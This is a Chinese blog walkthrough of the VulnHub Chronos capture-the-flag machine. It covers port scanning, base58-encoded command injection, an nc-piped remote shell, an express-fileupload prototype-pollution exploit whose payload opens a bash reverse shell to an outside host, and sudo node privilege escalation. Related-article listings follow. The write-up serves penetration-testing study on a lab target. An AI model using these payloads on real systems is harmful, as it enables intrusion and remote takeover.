Chronos靶机打靶过程(利用express-fileupload)

已于 2022-08-16 14:25:41 修改
阅读量3.8k 收藏 4
点赞数 17
分类专栏: 渗透 文章标签: 安全
于 2022-03-27 16:27:40 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_36025144/article/details/123769849
版权

靶机地址:

https://www.vulnhub.com/entry/chronos-1,735/

难度:中(构思巧妙)

目标:取得2个flag+root权限

涉及攻击方法:

  • 端口扫描
  • WEB侦察
  • 命令注入
  • 数据编解码
  • 搜索大法
  • 框架漏洞利用
  • 代码审计
  • NC串联
  • 本地提权

0x01

sudo netdiscover -r 10.0.2.0/16   #主机发现

在这里插入图片描述

sudo nmap -p- 10.0.2.6  #扫描全端口
sudo nmap -p22,80,8000 -sV 10.0.2.6  #扫描端口所开启的服务

在这里插入图片描述在这里插入图片描述

0x02

访问80端口并查看页面源码

在这里插入图片描述

在script标签里发现一段脚本
var _0x5bdf = [
	'150447srWefj',
	'70lwLrol',
	'1658165LmcNig',
	'open',
	'1260881JUqdKM',
	'10737CrnEEe',
	'2SjTdWC',
	'readyState',
	'responseText',
	'1278676qXleJg',
	'797116soVTES',
	'onreadystatechange',
	'http://chronos.local:8000/date?format=4ugYDuAkScCG5gMcZjEN3mALyG1dD5ZYsiCfWvQ2w9anYGyL',
	'User-Agent',
	'status',
	'1DYOODT',
	'400909Mbbcfr',
	'Chronos',
	'2QRBPWS',
	'getElementById',
	'innerHTML',
	'date'
];
(function (_0x506b95, _0x817e36) {
	var _0x244260 = _0x432d;
	while (!![]) {
		try {
			var _0x35824b = -parseInt(_0x244260(126)) * parseInt(_0x244260(144)) + parseInt(_0x244260(142)) + parseInt(_0x244260(127)) * parseInt(_0x244260(131)) + -parseInt(_0x244260(135)) + -parseInt(_0x244260(130)) * parseInt(_0x244260(141)) + -parseInt(_0x244260(136)) + parseInt(_0x244260(128)) * parseInt(_0x244260(132));
			if (_0x35824b === _0x817e36)
				break;
			else
				_0x506b95['push'](_0x506b95['shift']());
		} catch (_0x3fb1dc) {
			_0x506b95['push'](_0x506b95['shift']());
		}
	}
}(_0x5bdf, 831262));
function _0x432d(_0x16bd66, _0x33ffa9) {
	return _0x432d = function (_0x5bdf82, _0x432dc8) {
		_0x5bdf82 = _0x5bdf82 - 126;
		var _0x4da6e8 = _0x5bdf[_0x5bdf82];
		return _0x4da6e8;
	}, _0x432d(_0x16bd66, _0x33ffa9);
}
function loadDoc() {
	var _0x17df92 = _0x432d, _0x1cff55 = _0x17df92(143), _0x2beb35 = new XMLHttpRequest();
	_0x2beb35[_0x17df92(137)] = function () {
		var _0x146f5d = _0x17df92;
		this[_0x146f5d(133)] == 4 && this[_0x146f5d(140)] == 200 && (document[_0x146f5d(145)](_0x146f5d(147))[_0x146f5d(146)] = this[_0x146f5d(134)]);
	}, _0x2beb35[_0x17df92(129)]('GET', _0x17df92(138), !![]), _0x2beb35['setRequestHeader'](_0x17df92(139), _0x1cff55), _0x2beb35['send']();
}
发现url
http://chronos.local:8000/date?format=4ugYDuAkScCG5gMcZjEN3mALyG1dD5ZYsiCfWvQ2w9anYGyL

chronos.local   #将域名添加到hosts文件 使其正常解析
刷新页面使用burpsuite截获

在这里插入图片描述

4ugYDuAkScCG5gMcZjEN3mALyG1dD5ZYsiCfWvQ2w9anYGyL   #base58解码

在这里插入图片描述

解码发现为date命令 使用命令注入

在这里插入图片描述

0x03

使用NC串联
&&nc 10.0.2.4 4444 | /bin/bash | nc 10.0.2.4 5555

在这里插入图片描述

进行信息收集

在这里插入图片描述

pwd  #查看当前所在位置
cat  #查看文件内容
ls  #查看所在目录下的内容
尝试在所在目录收集信息 没有发现有用的信息 进到opt目录下查看包含两个文件 依次查看文件内容 在chronos-v2文件下发现backend文件包含package.json 查看.json文件,发现express-fileupload,尝试查找express-fileupload漏洞
参考
import requests

cmd = 'bash -c "bash -i &> /dev/tcp/p6.is/8888 0>&1"'

# pollute
requests.post('http://p6.is:7777', files = {'__proto__.outputFunctionName': (
    None, f"x;console.log(1);process.mainModule.require('child_process').exec('{cmd}');x")})

# execute command
requests.get('http://p6.is:7777')

0x04

传到靶机执行该文件
python3 -m http.server 80   #在kali开启http.server服务提供下载
nc -nvlp 4444   #kali本机开启侦听端口
wget   #利用wget下载到靶机
python3 exp.py   #在靶机执行该文件

在这里插入图片描述

ls发现user.txt 得到第一个flag

在这里插入图片描述

0x05

进一步获得root权限

在这里插入图片描述

sudo node -e 'child_process.spawn("/bin/bash",{stdio:[0,1,2]})'   #利用sudo提升权限

在这里插入图片描述

在root.txt中发现第二个flag

在这里插入图片描述

0x06

成功获得2个flag和root权限

皮皮鲁xx
关注
  • 17
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
文件存储服务器 中间件,使用express-fileupload中间件 实现文件上传
weixin_34957720的博客
08-13 962
本文使用express作为服务端,使用express-fileupload库提供的中间件函数来接受从客户端传来的图片,并将图片作为文件存储在服务端。客户端使用create-react-app框架,bootstrap UI,axios发送http请求和提供进度条当前进度的值,上传成功后,根据图片在服务端上的位置,并显示图片。初始化项目mkdir react-file-upload // 创建项...
PyPI 官网下载 | python_chronos-0.2.0-py3-none-any.whl
02-07
资源来自pypi官网,解压后可用。 资源全名:python_chronos-0.2.0-py3-none-any.whl
Chronos - Time Control 2.4.7
06-16
Chronos - Time Control 2.4.7 时间控制插件。免费资源,作者不维护了也下架了。 不需要积分!有些人脸都不要了,作者都免费还需要积分。
探索Express-FileUpload: 简单易用的Node.js文件上传解决方案
最新发布
gitblog_00016的博客
03-25 432
探索Express-FileUpload: 简单易用的Node.js文件上传解决方案 项目地址:https://gitcode.com/richardgirges/express-fileupload 在开发Web应用程序时,文件上传功能是不可或缺的一部分。今天,我们要向大家介绍一个名为Express-Fileupload的开源库,它为Node.js和Express框架提供了简单而强大的文件上传功...
express-fileupload:简单的快速文件上传中间件,围绕busboy
02-04
表达文件上传 用于上传文件的简单快速中间件。 安全须知 请安装此软件包的1.1.10+版,以避免Node / EJS中与JS原型污染相关的安全漏洞。 仅当您将parseNested选项设置为true (默认情况下为false )时,此漏洞才适用。 安装 # With NPM npm i express-fileupload # With Yarn yarn add express-fileupload 用法 上传文件时,可以从req.files访问该文件。 例: 您正在上传一个名为car.jpg的文件 您输入的名称字段为foo : <input name="foo" type="file"
node-red-contrib-chronos:基于时间的Node-RED调度,排队,路由,过滤和操作节点
04-29
节点红色贡献时间 Node-RED节点的集合,用于基于日期和时间的调度,排队,路由,过滤和操作。 还支持自动计算太阳事件(日出,日落,黄昏,黎明等)或月亮事件(月出,月落)的时间。 如果您遇到错误,想提出一个新功能,或者只是想分享您对该软件的看法,请查看GitHub存储库上的,以了解有关如何为该项目做出贡献的更多信息。 如果您需要帮助或有疑问,请查看的。 要查看该软件的最新版本中发生了什么更改,请查看项目的。 排程器 在特定时间安排消息的传输或全局/流变量的设置。 延迟到 将每个消息延迟通过节点,直到到达特定时间为止。 定时开关 根据特定时间路由消息。 时间过滤器 根据特定时间过滤消息。 时间变更 修改消息或上下文存储中的时间值。 文献资料 每个节点的详细文档可在GitHub存储库的Wiki中找到。 →文档 执照 版权所有(c)2021 Jens-Uwe Rossbach 此
VulnHub靶场-Chronos
热爱学习,喜欢折腾!
06-11 846
Vulnhub是一个提供各种漏洞环境的靶场平台,供安全爱好者学习渗透使用,大部分环境是做好的虚拟机镜像文件,镜像预先设计了多种漏洞,需要使用VMware或者VirtualBoxBoot打开,从启动虚机到获取操作系统的root权限和查看flag。
【VulnHub靶场】——CHRONOS: 1
热门推荐
Demo不是emo的博客
12-31 1万+
24次系统性打靶第三次训练,每次打靶后都会分享靶场攻略和总结的知识点
Chronos靶机打靶过程与思路
qq_52610024的博客
04-06 3373
1.常规主机侦探,sudonetdiscover-r10.0.2.0/162.常规端口和服务侦探3.cyberchet解码器,针对js代码4.发现一个本地域名解析地址,修改etc下的hosts文件对应地址解析5.bp抓包后在cyberchef平台上解码发现为base58编码,是一串时间的函数执行,所以考虑使用命令执行6.编码后提交nc串联攻击获得反弹shell,开始代码审计,最后发现node.js下的express-fileupload模块。...
CVE-2020-7699漏洞分析
gental_z的博客
08-11 1518
CVE-2020-7699漏洞分析 一、简介 CVE-2020-7699:NodeJS模块代码注入 该漏洞完全是由于Nodejs的express-fileupload模块引起,该模块的1.1.8之前的版本存在原型链污染(Prototype Pollution)漏洞,当然,引发该漏洞,需要一定的配置:parseNested选项设置为true 该漏洞可以引发DOS拒绝服务攻击,配合ejs模板引擎,可以达到RCE的目的 二、漏洞源码分析 如果想要复现的话,需要下载低版本的express-fileupload模块
Node.js与Express联合中间件express-fileupload使用axios实现文件上传
二木成林
11-26 2579
Node.js与Express 使用Node.js结合Express搭建web环境。只需要两个文件: upload-file.html:包含文件上传表单的html页面。 <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <title>文件上传</title> </head> <body> <input type="f
Chronos - Time Control 2.4.6.rar
01-05
Chronos - Time Control 2.4.6.rar
chronos-multi-cam-control
03-22
Chronos-Multi-Cam-Control网页 多摄像机控制Web界面使Chronos用户可以自由地通过以太网同时控制多台摄像机。用户可以开始/停止视频记录,设置分辨率,帧频,曝光,建立网络存储(SMB / NFS)并将视频保存到不同的...
TI Chronos .NET dll, C# example:使用 eZ430 Chronos .Net dll 的 C# 示例-开源
06-29
这是使用德州仪器Chronos手表(由Tobias Gartner编写(https://sourceforge.net/projects/ez430chronosnet/)编写的.NET ...在 Visual Studio 2010 Express 中创建,在 32 bin WinXP 和 eZ430 Chronos 开发工具下测试。
Chronos - Time Control v2.4.1
07-31
Chronos - Time Control v2.4.1.unitypackage 时光机插件
nim-chronosChronos-一个高效的异步编程库
02-03
nim-chronosChronos-一个高效的异步编程库
Vulnhub靶机:BOREDHACKERBLOG_ CLOUD AV
LainWith的博客
06-18 1199
系列:BoredHackerBlog(此系列共4台) 发布日期:2020年03月29日 难度:初级-中级 靶机地址:https://www.vulnhub.com/entry/boredhackerblog-cloud-av,453/ 内容简介: 这是本系列的第02次打靶,我选择了一个低难度级别的靶机。虽说难度级别为低,但是从还原整个渗透过程的角度来看,这个靶机非常全面。在这次打靶过程中,我们将使用到以下攻击手段:netdiscover主机发现 对于VulnHub靶机来说,出现“PCS Systemtech
VnlnHub CHRONOS 1
weixin_45682839的博客
09-03 536
VnlnHub CHRONOS 1靶场通关攻略记录,涉及知识包括:端口服务探测、解编码、命令注入、nc串联、linux本地提权、框架漏洞利用
express实现excel附件上传和和下载
qq_44472790的博客
06-04 899
简单封装一个写入流的函数writeStreamFun。这里只是模拟数据-非真实。express服务端代码。express服务端。附件导出前端下载代码。
chronos 文档
08-18
Chronos文档是一个对Chronos任务调度器的详细说明和指南。Chronos是一个分布式的、高可靠性的任务调度器,用于在Apache Mesos集群上运行周期性和定时任务。它提供了一个用户友好的界面来创建、管理和监控任务,并提供了灵活的调度选项和高度可配置的任务执行策略。 Chronos文档的主要目的是帮助用户了解Chronos的工作原理、配置选项和用法。该文档包含了详细的安装说明,包括对所需软件依赖的描述和配置示例。它还提供了对Chronos术语和概念的解释,以帮助用户更好地理解和使用它。 在Chronos文档中,用户可以了解到如何创建和配置任务,并通过示例代码和命令行指令来学习。文档还介绍了任务的调度和管理,包括如何调整任务优先级、设置依赖关系、定义失败策略等。 此外,Chronos文档还包含了对任务监控和日志查看的说明,以及如何使用API进行编程和集成的指引。用户可以了解如何通过RESTful API访问Chronos,并通过编程现有的任务和调度。 总之,Chronos文档是一个全面的指南,旨在帮助用户了解和使用这个强大的任务调度器。无论是初学者还是有经验的开发者,都可以从中获得对Chronos的深入理解,并能够有效地管理和运行周期性和定时任务。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

皮皮鲁xx

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值